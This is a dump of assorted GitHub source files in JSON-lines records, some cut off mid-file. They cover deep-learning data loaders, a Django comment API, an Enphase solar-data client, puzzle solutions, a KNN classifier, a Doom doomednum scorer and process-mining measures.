dataset=VideoDataset(dataset.recombined_gallery, spatial_transform_test, temporal_transform_test),\n            sampler=DistributedInferenceSampler(dataset.recombined_gallery),\n            batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n            pin_memory=True, drop_last=False, shuffle=False)\n\n        return trainloader, queryloader, galleryloader, dataset, train_sampler\n    # image dataset\n    else:\n        
transform_train, transform_test = build_img_transforms(config)\n train_sampler = DistributedRandomIdentitySampler(dataset.train, \n num_instances=config.DATA.NUM_INSTANCES, \n seed=config.SEED)\n trainloader = DataLoaderX(dataset=ImageDataset(dataset.train, transform=transform_train),\n sampler=train_sampler,\n batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=True)\n\n galleryloader = DataLoaderX(dataset=ImageDataset(dataset.gallery, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.gallery),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n if config.DATA.DATASET == 'prcc':\n queryloader_same = DataLoaderX(dataset=ImageDataset(dataset.query_same, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query_same),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n queryloader_diff = DataLoaderX(dataset=ImageDataset(dataset.query_diff, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query_diff),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n return trainloader, queryloader_same, queryloader_diff, galleryloader, dataset, train_sampler\n else:\n queryloader = DataLoaderX(dataset=ImageDataset(dataset.query, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n return trainloader, queryloader, galleryloader, dataset, train_sampler\n\n \n\n \n","repo_name":"guxinqian/Simple-CCReID","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"35"} +{"seq_id":"1121666211","text":"from typing import Any, List\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.utils import IntegrityError\nfrom django.http import HttpRequest, HttpResponse, JsonResponse, response\nfrom ninja import Router\nfrom ninja.errors import HttpError\n\nfrom comment.API.V1.schemas import (\n CommentsResponse,\n CreateCommentRequest,\n CreateCommentResponse,\n DeleteCommentRequest,\n DeleteCommentResponse,\n UpdateCommentRequest,\n UpdateCommentResponse,\n)\nfrom comment.models import Comment\nfrom comment.services import (\n create_comment,\n delete_comment,\n read_comments,\n read_replys,\n read_user_comments,\n update_comment,\n)\n\nrouter = Router(tags=[\"comment\"])\n\n\n@router.get(\"/read_user/{user}\", response={200: List[CommentsResponse]})\ndef comment_read_user(request: HttpRequest, user: int) -> List[Comment]:\n comments = read_user_comments(user)\n if len(comments) == 0:\n raise HttpError(404, \"Comment is None\")\n return comments\n\n\n@router.get(\"/read/{repo}\", response={200: List[CommentsResponse]})\ndef comment_read(request: HttpRequest, repo: str) -> List[Comment]:\n comments = read_comments(int(repo))\n if len(comments) == 0:\n raise HttpError(404, \"Comment is None\")\n return comments\n\n\n@router.get(\"/read_reply/{repo}\", response={200: List[CommentsResponse]})\ndef comment_reply_read(request: HttpRequest, repo: str) -> List[Comment]:\n replys = read_replys(int(repo))\n if len(replys) == 0:\n raise HttpError(404, \"Comment is None\")\n return 
replys\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.post(\"/create/\", response={201: CreateCommentResponse})\ndef comment_create(\n    request: HttpRequest, create_comment_request: CreateCommentRequest\n) -> dict:\n    user_id = request.user.id\n    try:\n        create_comment(\n            user_id,\n            create_comment_request,\n        )\n    except IntegrityError:\n        raise HttpError(422, \"Empty Space\")\n    return JsonResponse({\"result\": \"success\"}, status=201)\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.put(\"/update\", response={201: UpdateCommentResponse})\ndef comment_update(\n    request: HttpRequest, update_comment_request: UpdateCommentRequest\n) -> dict:\n    try:\n        update_comment(\n            request.user,\n            update_comment_request.COMMENT_ID,\n            update_comment_request.CONTENT,\n        )\n    except Comment.DoesNotExist:\n        raise HttpError(404, \"Comment is None\")\n    return JsonResponse({\"result\": \"success\"}, status=201)\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.delete(\"/delete\", response={201: DeleteCommentResponse})\ndef comment_delete(\n    request: HttpRequest, delete_comment_request: DeleteCommentRequest\n) -> dict:\n    try:\n        delete_comment(request.user, delete_comment_request.COMMENT_ID)\n    except Comment.DoesNotExist:\n        raise HttpError(404, \"Comment is None\")\n    return JsonResponse({\"result\": \"success\"}, status=201)\n","repo_name":"mungnpang/RR","sub_path":"comment/API/V1/comment_router.py","file_name":"comment_router.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25019483640","text":"import matplotlib.pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\nimport numpy as np\nimport pandas as pd\nimport argparse\n\n\ndef plot_pvals(df, plane, inputDir):\n    fig, ax = plt.subplots()\n    start, end = ax.get_xlim()\n    ax.xaxis.set_ticks(np.arange(start, end, 0.1))\n\n    key = 'pvals_' + plane\n    plt.xticks(np.arange(0.0, 1.1, 0.1))\n    ax.hist(df[key], bins=50, density=False)\n    plt.xlabel(\"p-value distribution from chi2 fit in \" + plane + \" plane for extracted candidates\")\n    plt.ylabel(\"Frequency\")\n    plt.savefig(inputDir + \"/p_value_distribution_\" + plane + \".png\", dpi=300)\n\n\nparser = argparse.ArgumentParser(description='extract track candidates')\nparser.add_argument('-i', '--input', help='input directory path')\nargs = parser.parse_args()\ninputDir = args.input\n\ndf = pd.read_csv(inputDir + \"/iteration_1/candidates/pvals.csv\")\n\nplot_pvals(df, 'xy', inputDir)\nplot_pvals(df, 'zr', inputDir)","repo_name":"nishalad95/GNN-track-finding","sub_path":"src/extract/p_value_distribution.py","file_name":"p_value_distribution.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14392584868","text":"def replace_str_index(text,index=0,replacement=''):\n    return '%s%s%s'%(text[:index],replacement,text[index+1:])\n\ndef deleteDigit(n):\n    numStr = str(n)\n    currentMax = 0\n    for digit in range(len(numStr)):\n        newNum = int(replace_str_index(numStr,digit))\n        if newNum > currentMax:\n            currentMax = newNum\n    return currentMax\n    \n","repo_name":"TheBroMoe/codeSignal","sub_path":"Arcade/intro/deleteDigit.py","file_name":"deleteDigit.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"33418572774","text":"from datetime import datetime\nfrom datetime import timedelta\nimport 
requests\nimport re\nimport os\nimport pickle\n\nclass Client():\n    URL = 'https://enlighten.enphaseenergy.com'\n\n    def __init__(self, utc_offset=-5, time_step=15,\n                 persist_session=False, session_file='enphase_cookie.p', \n                 persist_config=False, config_file='enphase_config.p'):\n        self.system_id = None\n        self.csrf_token = ''\n        self.cookies = None\n        self.power_data = {}\n        self.raw_data = {}\n        \n        self.persist_session = persist_session\n        self.cookie_file = session_file\n        self.persist_config = persist_config\n        self.config_file = config_file\n        \n        # NOTE: our time axis should start at local solar midnight\n        # and have units of minutes past UTC midnight\n        self.utc_offset = utc_offset\n        self.time_step = time_step\n        self.minute_axis = range(-utc_offset*60, (24-utc_offset)*60, time_step)\n        \n        if not self.load_session():\n            return\n        if not self.load_config():\n            self.fetch_config()\n        \n    def login(self, username, password, force=False):\n        if force:\n            self.cookies = None\n        if self.cookies is not None:\n            return\n        self.fetch_csrf()\n        self.post_login(username, password)\n        self.save_session()\n        self.fetch_config()\n\n    def fetch_csrf(self):\n        resp = requests.get(self.URL)\n        csrf_pattern = 'name=\"authenticity_token\" value=\"(\\\S+)\"'\n        csrf_match = re.search(csrf_pattern, resp.text)\n        if csrf_match is None:\n            return\n        self.csrf_token = csrf_match[1]\n\n    def post_login(self, username, password):\n        path = '/login/login'\n        params = {\n            'user[email]': username,\n            'user[password]': password,\n            'authenticity_token': self.csrf_token,\n            'commit': 'Sign In',\n            'utf8': '✓'\n        }\n        headers = {\n            'origin': 'https://enlighten.enphaseenergy.com',\n            'referer': 'https://enlighten.enphaseenergy.com/'\n        }\n        resp = requests.post(self.URL+path, data=params, headers=headers, allow_redirects=False)\n        self.cookies = resp.cookies\n    \n    def save_session(self):\n        if not self.persist_session:\n            return\n        if not os.path.exists('tmp'):\n            os.mkdir('tmp')\n        pickle.dump( self.cookies, open( self.cookie_file, \"wb\" ) )\n    \n    def load_session(self):\n        if not os.path.exists(self.cookie_file):\n            return False\n        self.cookies = pickle.load(open( self.cookie_file, \"rb\" ))\n        return self.cookies is not None\n    \n    def fetch_config(self, force=False):\n        if self.system_id is not None:\n            return\n        self.fetch_system_id()\n        self.fetch_layout()\n        self.save_config()\n\n    def fetch_system_id(self):\n        resp = requests.get(self.URL, cookies=self.cookies, allow_redirects=False)\n        self.system_id = re.search('https://\\\S+/systems/(\\\S+)', resp.headers['location'])[1]\n\n    def fetch_layout(self):\n        path = f'/systems/{self.system_id}/site_array_layout_x'\n        resp = requests.get(self.URL + path, cookies=self.cookies)\n        arr = resp.json()\n        # NOTE: sort by position along x\n        self.modules = sorted(arr['arrays'][0]['modules'], key= lambda x: x['x'])\n        self.device_index = [ m['inverter']['inverter_id'] for m in self.modules ]\n    \n    def save_config(self):\n        if not self.persist_config:\n            return\n        c_data = {\n            'system_id': self.system_id,\n            'device_index': self.device_index\n        }\n        pickle.dump( c_data, open( self.config_file, \"wb\" ) )\n\n    def load_config(self):\n        if not os.path.exists(self.config_file):\n            return False\n        c_data = pickle.load(open( self.config_file, \"rb\" ))\n        self.system_id = c_data['system_id']\n        self.device_index = c_data['device_index']\n        return True\n\n    def time_axis(self, start):\n        mins = self.minute_axis\n        return [ start + timedelta(minutes=int(m)) for m in mins ]\n\n    def get_day(self, date):\n        date_str = date.strftime('%Y-%m-%d')\n        path = 
f'/systems/{self.system_id}/inverter_data_x/time_series.json'\n params = {'date': date_str}\n return requests.get(self.URL + path, params=params, cookies=self.cookies).json()\n\n def fetch_day(self, date):\n date_key = date.strftime('%Y-%m-%d')\n self.power_data[date_key] = self.process_day(self.get_day(date))\n\n def inverter_details(self, date):\n # { \"date\": \"...\", \"ch_id\": ..., \n # \"POWR\":[[
    \")\n\n","repo_name":"sitbon/hydra-chain-bot","sub_path":"hybot/bot/hydra/tz.py","file_name":"tz.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17320558377","text":"# -*- coding: utf-8 -*-#\n\"\"\"\n@File : neighbors.py \n@Contact : sheng_jun@yeah.net\n@Author : Ace\n@Description: \n@Modify Time @Version @Desciption\n------------ -------- -----------\n2021-07-25 0:06 1.0 None\n\"\"\"\nimport numpy as np\nfrom collections import Counter\nfrom math import sqrt\nfrom .metrics import accuracy_score\n\n\nclass KNeighborsClassifier:\n \"\"\"\n 通过KNeighbors创建一个kNN类,用于分类算法\n \"\"\"\n\n def __init__(self, n_neighbors=5):\n assert n_neighbors > 1, \"n_neighbors必须是有效的\"\n self.n_neighbors = n_neighbors\n self._X_train = None\n self._y_train = None\n\n def fit(self, X_train, y_train):\n \"\"\"数据拟合过程,在kNN中为了何其他机器学习格式统一,加入这个方法,进行训练数据赋值\"\"\"\n assert X_train.shape[0] == y_train.shape[0], \"传入的训练特征数据必须与传入的训练结果样本数相同\"\n assert self.n_neighbors <= X_train.shape[0], \"n_neighbors传入值不能超过训练特征样本数\"\n self._X_train = X_train\n self._y_train = y_train\n return self\n\n def predict(self, X_predict):\n \"\"\"对输入的X_predict进行预测,预测之前必须进行数据拟合\"\"\"\n assert self._X_train is not None and self._y_train is not None, \"predict之前必须先进行fit\"\n assert self._X_train.shape[1] == X_predict.shape[1], \"预测特征向量的维度必须等于测试特征向量的维度\"\n y_predict = [self._predict(x) for x in X_predict]\n return np.array(y_predict)\n\n def _predict(self, x):\n assert x.shape[0] == self._X_train.shape[1], \"预测值的特征维度必须等于训练集的特征维度\"\n distances = [sqrt(np.sum((x_train - x) ** 2)) for x_train in self._X_train]\n nearest = np.argsort(distances)\n topK_y = self._y_train[nearest[:self.n_neighbors]]\n votes = Counter(topK_y)\n votes.most_common(1)\n return votes.most_common(1)[0][0]\n\n def score(self, X_test, y_test):\n y_predict = self.predict(X_test)\n return accuracy_score(y_test, y_predict)\n","repo_name":"on3o/Luna","sub_path":"moon/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1516512479","text":"def getLeaders(nums):\n leaders = []\n if not nums:\n return False\n for i in range(len(nums)):\n flag = True\n for j in range(i+1, len(nums)):\n if nums[i] < nums[j]:\n flag = False\n break\n if flag == True:\n leaders.append(nums[i])\n return leaders\n\n#nums = [16,17,4,3,5,2]\n#nums = [1, 2, 3, 4, 0]\nnums = [7, 4, 5, 7, 3]\nprint(getLeaders(nums))\n","repo_name":"kumvika/leetcode-solution","sub_path":"leadersInArray.py","file_name":"leadersInArray.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6451847323","text":"import redis\nimport ujson as json\n\nimport pytz\nimport time\nimport datetime\nimport logging\nfrom collections import defaultdict\nfrom django.utils import timezone\nfrom croniter import croniter\nimport asyncio\nfrom abc import abstractmethod, ABCMeta\nimport aioredis\n\nfrom trader.utils.func_container import CallbackFunctionContainer\nfrom trader.utils.read_config import config\n\nlogger = logging.getLogger('BaseModule')\n\n\nclass BaseModule(CallbackFunctionContainer, metaclass=ABCMeta):\n def __init__(self):\n super().__init__()\n self.io_loop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.io_loop)\n self.redis_client = aioredis.from_url(\n f\"redis://{config.get('REDIS', 
'host', fallback='localhost')}:\"\n f\"{config.getint('REDIS', 'port', fallback=6379)}/{config.getint('REDIS', 'db', fallback=0)}\",\n decode_responses=True)\n self.raw_redis = redis.StrictRedis(host=config.get('REDIS', 'host', fallback='localhost'),\n port=config.getint('REDIS', 'port', fallback=6379),\n db=config.getint('REDIS', 'db', fallback=0), decode_responses=True)\n self.sub_client = self.redis_client.pubsub()\n self.initialized = False\n self.sub_tasks = list()\n self.sub_channels = list()\n self.channel_router = dict()\n self.crontab_router = defaultdict(dict)\n self.datetime = None\n self.time = None\n self.loop_time = None\n\n def _register_callback(self):\n self.datetime = timezone.localtime()\n self.time = time.time()\n self.loop_time = self.io_loop.time()\n for fun_name, args in self.callback_fun_args.items():\n if 'crontab' in args:\n key = args['crontab']\n self.crontab_router[key]['func'] = getattr(self, fun_name)\n self.crontab_router[key]['iter'] = croniter(args['crontab'], self.datetime)\n self.crontab_router[key]['handle'] = None\n elif 'channel' in args:\n self.channel_router[args['channel']] = getattr(self, fun_name)\n\n def _get_next(self, key):\n return self.loop_time + (self.crontab_router[key]['iter'].get_next() - self.time)\n\n def _call_next(self, key):\n if self.crontab_router[key]['handle'] is not None:\n self.crontab_router[key]['handle'].cancel()\n self.crontab_router[key]['handle'] = self.io_loop.call_at(self._get_next(key), self._call_next, key)\n self.io_loop.create_task(self.crontab_router[key]['func']())\n\n async def install(self):\n try:\n self._register_callback()\n await self.sub_client.psubscribe(*self.channel_router.keys())\n asyncio.run_coroutine_threadsafe(self._msg_reader(), self.io_loop)\n # self.io_loop.create_task(self._msg_reader())\n for key, cron_dict in self.crontab_router.items():\n if cron_dict['handle'] is not None:\n cron_dict['handle'].cancel()\n cron_dict['handle'] = self.io_loop.call_at(self._get_next(key), self._call_next, key)\n self.initialized = True\n logger.debug('%s plugin installed', type(self).__name__)\n except Exception as e:\n logger.error('%s plugin install failed: %s', type(self).__name__, repr(e), exc_info=True)\n\n async def uninstall(self):\n try:\n await self.sub_client.punsubscribe()\n # await asyncio.wait(self.sub_tasks, loop=self.io_loop)\n self.sub_tasks.clear()\n await self.sub_client.close()\n for key, cron_dict in self.crontab_router.items():\n if self.crontab_router[key]['handle'] is not None:\n self.crontab_router[key]['handle'].cancel()\n self.crontab_router[key]['handle'] = None\n self.initialized = False\n logger.debug('%s plugin uninstalled', type(self).__name__)\n except Exception as e:\n logger.error('%s plugin uninstall failed: %s', type(self).__name__, repr(e), exc_info=True)\n\n async def _msg_reader(self):\n # {'type': 'pmessage', 'pattern': 'channel:*', 'channel': 'channel:1', 'data': 'Hello'}\n async for msg in self.sub_client.listen():\n if msg['type'] == 'pmessage':\n channel = msg['channel']\n pattern = msg['pattern']\n data = json.loads(msg['data'])\n # logger.debug(\"%s channel[%s] Got Message:%s\", type(self).__name__, channel, msg)\n self.io_loop.create_task(self.channel_router[pattern](channel, data))\n elif msg['type'] == 'punsubscribe':\n break\n logger.debug('%s quit _msg_reader!', type(self).__name__)\n\n async def start(self):\n await self.install()\n\n async def stop(self):\n await self.uninstall()\n\n def run(self):\n try:\n self.io_loop.create_task(self.start())\n 
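# run_forever() blocks this thread until the loop is stopped; the except/finally handlers below do the cleanup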
self.io_loop.run_forever()\n        except KeyboardInterrupt:\n            self.io_loop.run_until_complete(self.stop())\n        except Exception as ee:\n            logger.error('An error occurred: %s', repr(ee), exc_info=True)\n            self.io_loop.run_until_complete(self.stop())\n        finally:\n            logger.debug('Program has exited')\n","repo_name":"BigBrotherTrade/trader","sub_path":"trader/strategy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1749,"dataset":"github-code","pt":"35"}
+{"seq_id":"971835809","text":"# -*- coding: utf-8 -*-\n\n\n# def consumer():\n#     r = 'here'\n#     for i in range(3):\n#         print(i, r)\n#         x = yield r\n#         y = yield 1\n#         print('x:', x, 'y:', y)\n#         r = r + str(i)\n\n\n# c = consumer()\n# n1 = c.__next__()\n# n2 = c.send(100)\n# n3 = c.__next__()\n# print('n1:%s,n2:%s,n3:%s' % (n1, n2, n3))\n\n\ndef fun():\n    for i in range(20):\n        x = yield i\n        print(\"fun,x=%s,i=%s\" % (x, i))\n\n\na = fun()\nnext(a)\nx = a.send(5)\nprint(x)\n","repo_name":"wccgoog/pass","sub_path":"python/learn_yield.py","file_name":"learn_yield.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"42073634322","text":"# Robot Vacuum (4991)\n\n'''\nSecond attempt: run BFS from the robot's position and from every dirty cell to get the minimum distance between each pair of coordinates.\n               Then take permutations over that information to find the minimum total distance.\n               1. Store the position of o in a variable / store the * cells in a list\n               2. Compute the distance from o to every *\n               3. Compute the distances between all pairs of *\n               4. Build every possible visiting order with permutations and print the minimum of the summed distances\n'''\n\nfrom collections import deque\nfrom itertools import permutations\nimport sys\n\ninput = sys.stdin.readline\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef bfs(x, y):\n    q = deque()\n    visited = [[0]*w for _ in range(h)]\n    q.append([x, y])\n    visited[x][y] = 1\n    while q:\n        x, y = q.popleft()\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            if 0 <= nx < h and 0 <= ny < w:\n                if matrix[nx][ny] != 'x' and not visited[nx][ny]:\n                    visited[nx][ny] = visited[x][y] + 1\n                    q.append([nx, ny])\n    return visited\n\nwhile True:\n    w, h = map(int, input().split())\n    if not w and not h:\n        break\n\n    matrix, d = [], []\n    for i in range(h):\n        row = list(input().strip())\n        matrix.append(row)\n        for j, k in enumerate(row):\n            if k == 'o':\n                sx, sy = i, j\n            elif k == '*':\n                d.append([i, j])\n\n    r2d, flag = [], 0\n    c = bfs(sx, sy)\n    for i, j in d:\n        if not c[i][j]:\n            flag = 1\n            break\n        r2d.append(c[i][j]-1)\n    if flag:\n        print(-1)\n        continue\n\n    d2d = [[0]*len(d) for _ in range(len(d))]\n    for i in range(len(d)-1):\n        c = bfs(d[i][0], d[i][1])\n        for j in range(i+1, len(d)):\n            d2d[i][j] = c[d[j][0]][d[j][1]]-1\n            d2d[j][i] = d2d[i][j]\n\n    p = list(permutations([i for i in range(len(d2d))]))\n    ans = sys.maxsize\n    for i in p:\n        dist = 0\n        dist += r2d[i[0]]\n        nfrom = i[0]\n        for j in range(1, len(i)):\n            nto = i[j]\n            dist += d2d[nfrom][nto]\n            nfrom = nto\n        ans = min(ans, dist)\n    print(ans)\n","repo_name":"apple2062/algorithm","sub_path":"study/sorting/로봇청소기.py","file_name":"로봇청소기.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35367130757","text":"import inout as io\nimport os\nfrom copy import deepcopy\nfrom time import sleep\n\nSTART = \"start.txt\"\n\nMATRIX_SIZE_1 = 20 # 43\nMATRIX_SIZE_2 = 20 # 80\n\ni_ADD = [-1, -1, -1, 0, 0, 1, 1, 1]\nj_ADD = [-1, 0, 1, -1, 1, -1, 0, 1]\n\ndef main():\n    global START\n    global MATRIX_SIZE_1\n    global MATRIX_SIZE_2\n    global i_ADD\n    global j_ADD\n\n    board = io.load(START, MATRIX_SIZE_1, MATRIX_SIZE_2) # extra
rows to handle index exceptions at the border\n    board1 = [[0 for j in range(MATRIX_SIZE_2 + 2)] for i in range(MATRIX_SIZE_1 + 2)] # extra rows to handle index exceptions at the border\n\n    io.printBoard(board, MATRIX_SIZE_1, MATRIX_SIZE_2)\n    inp = input()\n\n    while not inp == '0':\n        for i in range(1, MATRIX_SIZE_1 + 1):\n            for j in range(1, MATRIX_SIZE_2 + 1):\n                liveCells = 0\n                for k in range(8):\n                    liveCells += board[i + i_ADD[k]][j + j_ADD[k]]\n\n                if liveCells <= 1 or liveCells >= 4:\n                    board1[i][j] = 0\n                elif (board[i][j] == 1 and liveCells == 2) or liveCells == 3:\n                    board1[i][j] = 1\n                elif liveCells == 3:\n                    board1[i][j] = 1\n                else:\n                    board1[i][j] = 0\n                \n        board = deepcopy(board1)\n        os.system('cls')\n        io.printBoard(board, MATRIX_SIZE_1, MATRIX_SIZE_2)\n        #sleep(0.5)\n        inp = input()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"eru27/Python-Workshop","sub_path":"GameOfLife/Finished/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"73164444579","text":"import json\n\nfrom typing import Dict, Set\nfrom idgames.engine import Engine\nfrom utils.config import Config\nfrom utils.logger import Logger\n\nengine_factors = {\n    Engine.DOOM.value: 1.5,\n    Engine.HERETIC.value: 1.5,\n    Engine.HEXEN.value: 1.5,\n    Engine.STRIFE.value: 1.5,\n    Engine.BOOM.value: 1.0,\n    Engine.MBF.value: 1.0,\n    Engine.ZDOOM.value: 1.0,\n    Engine.GZDOOM.value: 1.0,\n    Engine.LEGACY.value: 1.0,\n    Engine.SKULLTAG.value: 1.0,\n    Engine.ZDAEMON.value: 1.0,\n    Engine.DOOMSDAY.value: 1.0,\n    Engine.EDGE.value: 1.0,\n    Engine.ETERNITY.value: 1.0,\n    Engine.DOOMRETRO.value: 1.0,\n    Engine.ZANDRONUM.value: 1.0,\n}\n\nconfig = Config()\n\nwith open(config.get('extractors.engine.doomednum_table'), 'r') as f:\n    engines = json.load(f)\n\n# Create sets of doomednums for each engine.\nengine_doomednums: Dict[str, Set[str]] = {}\nfor engine_key, doomednums in engines.items():\n\n    clean_doomednums = []\n    for doomednum in doomednums:\n        if isinstance(doomednum, int):\n            clean_doomednums.append(doomednum)\n        elif isinstance(doomednum, str):\n            a, b = doomednum.split('-')\n            a = int(a)\n            b = int(b)\n            for num in range(a, b + 1):\n                clean_doomednums.append(num)\n\n    engine_doomednums[engine_key] = set(clean_doomednums)\n\n# List which engines each doomednum appears in.\ndoomednum_engines: Dict[int, Set[str]] = {}\nfor engine_key, doomednums in engine_doomednums.items():\n    engine_factor = engine_factors.get(engine_key, 1.0)\n\n    for doomednum in doomednums:\n        if doomednum not in doomednum_engines:\n            doomednum_engines[doomednum] = set()\n        doomednum_engines[doomednum].add(engine_key)\n\n# Calculate score for each engine in each doomednum.\ndoomednum_scores: Dict[str, Dict[str, float]] = {}\nfor doomednum, engine_keys in doomednum_engines.items():\n    if len(engine_keys) == len(engine_factors):\n        continue\n\n    average = 1 / len(engine_keys)\n    presence_scores: Dict[str, float] = {}\n    for engine_key in engine_keys:\n        presence_scores[engine_key] = average * engine_factors[engine_key]\n\n    doomednum_scores[doomednum] = presence_scores\n\nwith open(config.get('extractors.engine.doomednum_scores'), 'w') as f:\n    json.dump(doomednum_scores, f, indent=4)\n","repo_name":"GitExl/DoomIdgamesArchive","sub_path":"idgames-extract/src/generatedoomednumscores.py","file_name":"generatedoomednumscores.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
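The generatedoomednumscores.py record above ends by dumping a {doomednum: {engine: score}} table to JSON. As a rough sketch of how such a table can be consumed — the `rank_engines` helper, the file name, and the example doomednums are hypothetical, not part of the archived repo — the scores of a map's doomednums can be summed per engine to rank likely target engines:

```python
import json
from collections import defaultdict
from typing import Dict, List

def rank_engines(scores_path: str, doomednums: List[int]) -> Dict[str, float]:
    # Load the {doomednum: {engine: score}} table produced by the generator;
    # json.dump stringifies the integer keys, so numbers are looked up as strings.
    with open(scores_path, 'r') as f:
        scores = json.load(f)

    totals: Dict[str, float] = defaultdict(float)
    for num in doomednums:
        for engine, score in scores.get(str(num), {}).items():
            totals[engine] += score
    # Highest total first: the most plausible engines for these doomednums.
    return dict(sorted(totals.items(), key=lambda kv: kv[1], reverse=True))

# Example call with made-up doomednums collected from a map's THINGS lump.
print(rank_engines('doomednum_scores.json', [2001, 9027, 14165]))
```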
+{"seq_id":"13336598435","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef filter_case_variants(ocel, variant_column, id_column, save_path):\n \"\"\"\n Function to filter an object-centric event log such that it only contains one case per case variant of the original log.\n :param ocel: object-centric event log that should be filtered, type: ocel-log\n :param variant_column: column name of the variant column in the log, type: string\n :param id_column: column name of the id column in the log, type: string\n :param save_path: path where the filtered log should be saved, type: string\n \"\"\"\n # generate the variants of the log by executing the variants method from the ocel class once\n ocel.variants\n # we filter down the dataframe to only keep the first appearance of each variant definition in the variant column\n case_ids = ocel.log.log.drop_duplicates(subset=[variant_column], keep='first')[id_column]\n # we generate a list to keep only the cases (process executions) that contain one of the ids that we filtered before\n # such that we only have one case per variant\n filtered_case_list = [s for s in ocel.process_executions if any(v in s for v in case_ids)]\n # we create a boolean mask indicating which rows contain case ids in the filtered list of sets\n mask = ocel.log.log[id_column].isin([i for s in filtered_case_list for i in s])\n # we apply the mask to the DataFrame to generate the filtered one\n filtered_df = ocel.log.log[mask]\n # in a next step we save the filtered dataframe as a csv file to be able to import it as an ocel-log\n filtered_df.to_csv(save_path, index=False)\n\ndef alignment_measure_events(ocel,ocpn):\n \"\"\"\n Function to calculate the alignment measure based on the used places summing over the events inside an object-centric petri-net.\n :param ocel: object-centric event log for which the measure should be calculated, type: ocel-log\n :param ocpn: corresponding object-centric petri-net, type: object-centric petri-net\n :return: final value of the formula, type: float rounded to 4 digits\n \"\"\"\n #list for values in sum of formula\n pnew = []\n # get a list of all activities that have been performed in the log\n log = ocel.log.log.event_activity\n # We only calculate the values for \"non-silent\" transitions\n transitions = [x for x in ocpn.transitions if not x.silent]\n # dictionary to store each activity as key and a list of its prior states/places as value\n targets = {}\n for arc in tqdm(ocpn.arcs, desc=\"Check the arcs\"):\n # for each arc, check if our target is a valid (non-silent) transition\n if arc.target in transitions:\n # load all the prior places of a valid transition into a dictionary, where the key is the transition and the value\n # a list of all directly prior places\n if arc.target.name in targets:\n targets[arc.target.name].append(arc.source.name)\n else:\n targets[arc.target.name] = [arc.source.name]\n # for each valid transition/event -> for computing reasons(efficiency), we work with a small difference to above\n for event in tqdm(transitions, desc=\"Save the transitions\"):\n # create an empty list where we can store all enabled transitions in the specific prior place\n enabled= []\n # print(event) #used for debugging\n # get the list of all events that are simultaneously possible in the current state\n for key in targets:\n # we check if the value is the same or if the value of another key is a subset, because then it is also enabled\n if (targets[event.name] == targets[key]) or 
(set(targets[key]).issubset(set(targets[event.name]))):\n enabled.append(key)\n # number of activities that can be triggered\n w = len(enabled)\n # number of times this state is visited in the log\n n = len(log[log.isin(enabled)])\n # frequency of event that is currently watched\n freq = len(log[log == event.name])\n #print(w) #used for debugging\n #print(n) #used for debugging\n #print(freq) #used for debugging\n # derive the value for the sum in the formula given\n if n >= w+2 :\n pnew.append(freq*(w*(w+1))/(n*(n-1)))\n else:\n pnew.append(freq*1)\n #derive the final generalization value\n return np.round((1 - np.sum(pnew)/len(log)),4)\n\n\ndef alignment_measure_states(ocel,ocpn):\n \"\"\"\n Function to calculate the alignment measure based on the used places summing over the states inside an object-centric petri-net.\n :param ocel: object-centric event log for which the measure should be calculated, type: ocel-log\n :param ocpn: corresponding object-centric petri-net, type: object-centric petri-net\n :return: final value of the formula, type: float rounded to 4 digits\n \"\"\"\n #list for values in sum of formula\n pnew = []\n # We only calculate the values for 